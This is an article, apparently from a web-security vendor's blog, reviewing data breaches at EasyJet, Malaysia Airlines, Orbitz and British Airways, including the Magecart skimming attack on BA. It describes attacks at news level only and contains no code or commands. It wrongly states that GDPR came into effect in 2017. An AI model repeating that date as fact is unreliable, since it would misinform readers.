Airline Data Breaches
Travel websites, in particular airlines are key targets for cyberattacks, the reward for compromised data is high in this industry due to the sensitivity of the data involved. Over the years, there have been a number of airline data breaches, with some companies suffering multiple attacks. By analysing some of the major airline and travel attacks over the years and being aware of tactics used by hackers, security procedures can be put in place to prevent attacks.
EasyJet
- 9 million customers affected
- 5 month-long breach
- 2,208 customers had financial information stolen
- £18 billion class-action lawsuit
On 19th May 2020, EasyJet provided a Notice of cybersecurity incident in which they revealed that in January 2020, they became aware of a cyber attack in which 9 million customers had been affected in a highly sophisticated attack. Customers who booked flights between October 17th, 2019 and March 4th 2020 were affected with email addresses and travel details accessed. Additionally, 2,208 of those customers had credit card details accessed. EasyJet warned the nine million customers whose email addresses were breached to be wary of phishing attacks.
UK cybercrime reporting agency Action Fraud said that by May 2020 there were 51 reports of credit card fraud resulting from the EasyJet data breach and the estimated loss to credit card holders stands at £11,752.81.
EasyJet’s fine is yet to be determined, however GDPR states that they could face fines from the ICO of 4% of the airline’s 2019 turnover. Additionally, law firm PGMBM is planning to file an £18 billion class-action lawsuit against EasyJet.
More cybersecurity issues for the firm include an investigation by Which?, in September 2020 exposed hundreds of security vulnerabilities on the websites of major airlines including 222 vulnerabilities across easyJet’s nine domains in June 2020.
Which? Explains:
“The vulnerabilities included two critical flaws, with one so serious that, if exploited, an attacker could hijack someone’s browsing session. This could open up opportunities to steal private data. In response to our research, easyJet took three domains offline and resolved the disclosed vulnerabilities on the other six sites.”
Malaysia Airlines
- 9 year-period
- Undisclosed number of affected customers
- Fine TBD
On March 1st 2021, in an email to members, Malaysia Airlines revealed a 9-year data breach involving data registered between March 2010 and June 2019. The data security incident occurred at a third-party IT service provider, not Malaysia Airlines’ own infrastructure. The hack exposed frequent flyer member data in its Enrich program. Malaysia Airlines claims there is no evidence of the data being used maliciously. Data stolen included customer name, date of birth, contact information, and various frequent flyer data such as number, status, and tier level.
Expedia owned Orbiz
- 3 month-long data breach
- 2 years worth of records accessed
- 880,000 affected payment cards
- $110,000 fine
On March 1st, 2018, Expedia-owned Orbitz disclosed a security breach in which hosted travel rewards redemption service had been hacked. The hackers were able to access personal information stored on its consumer and business partner platforms. The attack took place between October and December 2017, however records date back to January 1st, 2016. Information accessed included names, addresses, dates of birth, email addresses, and credit card information. Orbitz, acquired by Expedia in 2015 for $1.6 billion, put security procedures in place for the compromised platform and said the current website was not involved. Orbitz notified consumers of the breach and offered a year’s credit and identity protection services. In 2019, the company reached a settlement with the Pennsylvania attorney general’s office of a $110,000 fine.
British Airways
- 420,000 customers affected
- 15 day-long breach
- £20m fine
- 16,000 consumers claimed compensation
In 2018, British Airways suffered a devastating web-skimming attack, affecting 420,000 customers over a 15-day period. The data breach was first disclosed 6th September 2018. Customers who booked flights through the website or BA app were directed to a fake website checkout that siphoned off their personal and financial details. The group responsible for the attack ‘Magecart’, inserted 22 lines of JavaScript code via a vulnerability to siphon credit card details. Personal details included names, usernames, passwords, addresses and credit card details. The web-skimming attack was executed using a tactic called domain spoofing. Web-skimming attacks often include domain spoofing to assist in going undetected. British Airways malicious skimmer exfiltrated card details to a spoof domain, ‘baways.com’.
Monitoring where data is being sent to is imperative for travel companies, using a detection tool, British Airways would have been alerted to this attack in minutes not weeks, meaning the malicious code could have been removed and vulnerability patched much sooner, protecting hundreds of thousands of customers’ personal and financial information.
The General Data Protection Regulation (GDPR) came into effect in 2017, British Airways were one of the first companies penalties to be made public since the new regulations came into force. British Airways were fined £20m down from £183m by the Information Commissioner’s Office (ICO), to be equivalent to 1.5% of its global turnover, although 4% of turnover could have been fined. Law firm PGMBM also filed the largest opt-in group action class action in UK history, in which 16,000 customers signed up for the action against the company.
Information Commissioner Elizabeth Denham said:
“People’s personal data is just that – personal. When an organisation fails to protect it from loss, damage or theft, it is more than an inconvenience. That’s why the law is clear – when you are entrusted with personal data, you must look after it. Those that don’t will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights.”
Sam Jenkins, Principle Security Developer – RapidSpike
“During the pandemic, we saw a 20% rise in web-skimming attacks, and Magecart continues to be the number one security threat to websites today. A good indicator of the legitimacy of the domain is to check the WHOIS record and view when and where the domain was registered, and who to. Often attackers only register the domain a few days or weeks before an attack takes place. In the case of British Airways ‘baways.com’ domain was used, consumers were unaware of this domain not being part of the British Airways group, however the company should have been aware much sooner. Airlines and travel websites need to improve security systems by taking a proactive and reactive approach to avoid data exposure, fines and reputational damage.”